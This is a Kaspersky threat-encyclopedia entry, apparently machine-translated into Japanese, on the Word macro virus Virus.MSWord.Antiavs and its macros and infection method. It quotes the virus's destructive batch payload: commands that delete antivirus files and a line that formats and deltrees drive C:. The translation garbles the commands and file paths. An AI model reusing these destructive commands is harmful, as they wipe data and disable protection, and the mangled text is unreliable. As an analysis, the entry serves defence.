Kaspersky Threats

クラス

プラットフォーム

説明

技術的な詳細

これは、暗号化された中国語Wordマクロウイルスです。 AutoExec、AAV、AutoOpen、AutoNew、FileSaveAs、ZlockMacro、FileTemplates、ToolsMacro、Organizerの9つのマクロが含まれています。

このウイルスは、感染したドキュメントを開くときにグローバルマクロ領域に感染し（AutoOpen）、新しい名前で保存されたドキュメント（FileSaveAs）に自身を書き込みます。

ファイル/テンプレートメニュー（FileTemplate）に入ると、ウイルスは現在のドキュメントのパスワード「AntiAVs」を設定し、MessageBoxを表示します。



WordBasic Err = 16

メモリーが充分ではありません！

ツール/マクロメニュー（ToolsMacro）に入ると、ウイルスは現在のドキュメント内のすべてのテキストを消去し、アンチウイルスPC-CILLINファイルを消去するコマンドをAUTOEXEC.BATファイルに追加します。



エコーオフ

attrib -h -r -s + ac：pc-cil〜1 *。*> nul

del c：pc-cil〜1 * .dll> nul

このウイルスは、ウイルス対策ファイルを消去します。



C：PC-Cillin 95Lpt $ vpn。*

C：PC-Cillin 97Lpt $ vpn。*

C：TscPC-Cillin 97Lpt $ vpn。*

C：ZlockavGsav.cas

C：VB7Virus.txt

C：プログラムファイルNorton AntiVirusViruscan.dat

C：Program FilesSymantecSymevnt.386

C：Program FilesMcAfeeVirusScan95Scan.dat

C：Program FilesMcAfeeVirusScan95Mcscan32.dll

C：Program FilesMcAfeeVirusScanScan.dat

C：Program FilesMcAfeeVirusScanMcscan32.dll

C：プログラムFilesCommandソフトウェアF-PROT95Sign.def

C：プログラムFilesCommandソフトウェアF-PROT95Dvp.vxd

C：プログラムFilesAntiViral Toolkit ProAvp32.exe

C：プログラムFilesAntiViral Toolkit Pro * .avc

C：Tbavw95Tbavw95.vxd

システムのランダムカウンタに応じて、ウイルスはテキストをAUTOEXEC.BATファイルに書き込みます。



@エコーオフ

CLS

エコー私は巨大なウイルスをきれいにする：

エコーMS-WINDOWS

あなたのためにエコー。 ^ _ ^

エコー – アンチウイルス –

エコーy |形式c：/ u / v：AAV> nul

deltree / yc：> nul

オリジナルへのリンク

お住まいの地域に広がる脅威の統計をご覧ください

クラス	Virus
プラットフォーム	MSWord
説明	技術的な詳細これは、暗号化された中国語Wordマクロウイルスです。 AutoExec、AAV、AutoOpen、AutoNew、FileSaveAs、ZlockMacro、FileTemplates、ToolsMacro、Organizerの9つのマクロが含まれています。このウイルスは、感染したドキュメントを開くときにグローバルマクロ領域に感染し（AutoOpen）、新しい名前で保存されたドキュメント（FileSaveAs）に自身を書き込みます。ファイル/テンプレートメニュー（FileTemplate）に入ると、ウイルスは現在のドキュメントのパスワード「AntiAVs」を設定し、MessageBoxを表示します。 WordBasic Err = 16 メモリーが充分ではありません！ツール/マクロメニュー（ToolsMacro）に入ると、ウイルスは現在のドキュメント内のすべてのテキストを消去し、アンチウイルスPC-CILLINファイルを消去するコマンドをAUTOEXEC.BATファイルに追加します。エコーオフ attrib -h -r -s + ac：pc-cil〜1 。> nul del c：pc-cil〜1 * .dll> nul このウイルスは、ウイルス対策ファイルを消去します。 C：PC-Cillin 95Lpt $ vpn。* C：PC-Cillin 97Lpt $ vpn。* C：TscPC-Cillin 97Lpt $ vpn。* C：ZlockavGsav.cas C：VB7Virus.txt C：プログラムファイルNorton AntiVirusViruscan.dat C：Program FilesSymantecSymevnt.386 C：Program FilesMcAfeeVirusScan95Scan.dat C：Program FilesMcAfeeVirusScan95Mcscan32.dll C：Program FilesMcAfeeVirusScanScan.dat C：Program FilesMcAfeeVirusScanMcscan32.dll C：プログラムFilesCommandソフトウェアF-PROT95Sign.def C：プログラムFilesCommandソフトウェアF-PROT95Dvp.vxd C：プログラムFilesAntiViral Toolkit ProAvp32.exe C：プログラムFilesAntiViral Toolkit Pro * .avc C：Tbavw95Tbavw95.vxd システムのランダムカウンタに応じて、ウイルスはテキストをAUTOEXEC.BATファイルに書き込みます。 @エコーオフ CLS エコー私は巨大なウイルスをきれいにする：エコーMS-WINDOWS あなたのためにエコー。 ^ _ ^ エコー – アンチウイルス – エコーy \|形式c：/ u / v：AAV> nul deltree / yc：> nul
	オリジナルへのリンク
	お住まいの地域に広がる脅威の統計をご覧ください

Virus.MSWord.Antiavs

技術的な詳細